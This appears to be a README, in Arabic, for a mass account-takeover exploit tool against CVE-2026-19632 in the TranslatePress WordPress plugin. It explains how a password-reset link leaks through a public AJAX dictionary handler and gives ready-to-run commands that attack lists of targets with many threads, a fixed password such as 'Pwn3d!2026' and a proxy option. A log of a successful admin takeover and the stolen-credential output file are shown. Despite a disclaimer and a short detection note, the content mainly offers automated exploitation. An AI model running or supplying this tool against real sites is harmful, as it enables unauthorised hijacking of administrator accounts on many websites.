
إثبات مفهوم (PoC) للاستيلاء على الحساب دون مصادقة في TranslatePress Multilingual <= 3.3.1 (ووردبريس)
أداة استيلاء جماعي على الحسابات لثغرة CVE-2026-19632، وهي استيلاء غير مصادق على الحساب في إضافة TranslatePress – Multilingual لووردبريس (≤ 3.3.1) ناتجة عن كشف رابط إعادة تعيين كلمة المرور. أمر واحد لكل قائمة أهداف — السلسلة الكاملة تعمل تلقائيًا، وكل عملية استيلاء ناجحة تُكتب إلى ملف الإخراج في اللحظة التي تحدث فيها.
إخلاء مسؤولية — للاستخدام المصرح به فقط. هذه الأداة تغيّر كلمات مرور الحسابات الفعلية وتُرسل رسائل إعادة تعيين كلمة مرور فعلية. استخدمها حصريًا ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام.
| CVE | CVE-2026-19632 |
| المنتج | TranslatePress – Multilingual (إضافة ووردبريس، slug translatepress-multilingual)، من Cozmoslabs |
| المتأثر | جميع الإصدارات ≤ 3.3.1 (أكثر من 400,000 تثبيت نشط) |
| المُصحَّح | 3.3.2 (الإصلاح: فحص current_user_can على معالج AJAX العام للقاموس) |
| CVSS 3.1 | 9.8 حرجة — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (CNA: Wordfence) |
| CWE | CWE-200 (كشف معلومات حساسة) + CWE-640 (آلية استعادة كلمة مرور ضعيفة) |
| التأثير | استيلاء غير مصادق على حساب المسؤول |
trp_data بما في ذلك nonce الخاص بـ get_translations. الـ nonces للزوار
غير المسجلين عامة بطبيعتها؛ تعتمد عليها الإضافة للأمان.wp_mail وتترجم رسائل البريد الصادرة بلغة المستلم.
عندما يطلق مهاجم مجهول wp-login.php?action=lostpassword
لمسؤول تكون لغة ملفه الشخصي لغة ثانوية منشورة،
فإن رسالة إعادة التعيين بأكملها — بما في ذلك رابط wp-login.php?action=rp
النصي مع مفتاح إعادة التعيين الصالح — تُدرج في
wp_trp_dictionary_<default>_<locale> بشكل متزامن داخل
طلب المهاجم. حتى أن SMTP لا يحتاج إلى العمل.trp_get_translations_regular مسجَّل
كـ wp_ajax_nopriv وقبل 3.3.2 كان يتحقق فقط من الـ nonce العام.
يمكن لأي شخص تعداد القاموس عبر string_ids واستخراج المفتاح.الشرح الفني الكامل: CVE-2026-19632-REPORT.md
cve-2026-19632.pyسكربت واحد مكتفٍ ذاتيًا ينفذ السلسلة الكاملة لكل هدف في القائمة:
readme.txt)trp_data + فحص مبدّل اللغة)url|username|password بملف الإخراج
(flush، آمن للخيوط، دون انتظار انتهاء التشغيل)متانة مدمجة:
--new-password).pip install -r requirements.txt
# تنفيذ كامل ضد قائمة أهداف، 20 خيطًا
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 20
# كلمة مرور ثابتة لكل هدف
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --new-password 'Pwn3d!2026'
# عبر وكيل
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --proxy http://127.0.0.1:8080
| الخيار | الوصف |
|---|---|
-l, --list | ملف يحتوي على رابط هدف واحد لكل سطر (تعليقات # مسموحة) |
-o, --output | ملف النتائج، الصيغة url|username|password (الافتراضي vuln.txt) |
-t, --threads | العمال المتزامنون (الافتراضي 10) |
--new-password | كلمة مرور ثابتة لجميع الأهداف (الافتراضي: 14 حرفًا عشوائيًا لكل هدف) |
--timeout | مهلة كل طلب بالثواني (الافتراضي 15) |
--proxy | وكيل HTTP، مثال http://127.0.0.1:8080 |
--no-color | تعطيل الإخراج الملون |
سجل طرفية ضد مثيل مختبري (WordPress 7.0.4 + TranslatePress 3.3.1،
ar افتراضي → en_US ثانوية) — القيم مُنقّاة:
[00:09:06] [INFO] أداة استيلاء CVE-2026-19632 - 3 هدف(أهداف)، 3 خيط(خيوط)...
[00:09:06] [SKIP] http://example.com (لا يوجد TranslatePress)
[00:09:07] [INFO] http://TARGET تم العثور على TP - اللغات: ar->en_US، nonce=a1b2c3d4e5
[00:09:09] [INFO] مرشحو أسماء المستخدمين: ['admin', ...]
[00:09:09] [WARN] المحاولة 1/3 فشلت (مفتاح منتهي)
[00:09:09] [WARN] المحاولة 2/3 فشلت (مفتاح منتهي)
[00:09:09] [WARN] المحاولة 3/3 فشلت (مفتاح منتهي)
[00:09:09] [INFO] جميع المفاتيح منتهية - تفعيل إعادة تعيين جديدة...
[00:09:15] [TAKEOVER] http://TARGET نجاح - user='admin' password='Pwn3d!2026'
[00:09:15] [INFO] تم. الملخص: ERROR=1 | SKIP=1 | TAKEOVER=1
vuln.txt (مكتوب مباشرة، في لحظة النجاح):
http://TARGET|admin|Pwn3d!2026
تعامل مع
vuln.txtكأصل حساس — يحتوي على بيانات اعتماد حية و/أو مفاتيح إعادة تعيين صالحة. أضفه إلى.gitignore.
غير مطلوب: خادم بريد يعمل (الرابط مخزَّن داخل
مرشح wp_mail، قبل محاولة الإرسال).
admin-ajax.php بحثًا عن تعداد متسلسل لـ string_ids
مع nonce عام security.| التاريخ | الحدث |
|---|---|
| 2026-08-12 | حجز CVE-2026-19632 |
| 2026-08-13 | إصدار TranslatePress 3.3.2 مع الإصلاح |
| 2026-08-25/26 | Wordfence تنشر الاستشارة؛ حظر 8,618 محاولة استغلال خلال 24 ساعة |
| 2026-08-28 | استشارة ThaiCERT |
momopon1415) وفريق Wordfence، المذكورون في سجل تغييرات 3.3.2.MIT © 2026 ghostpel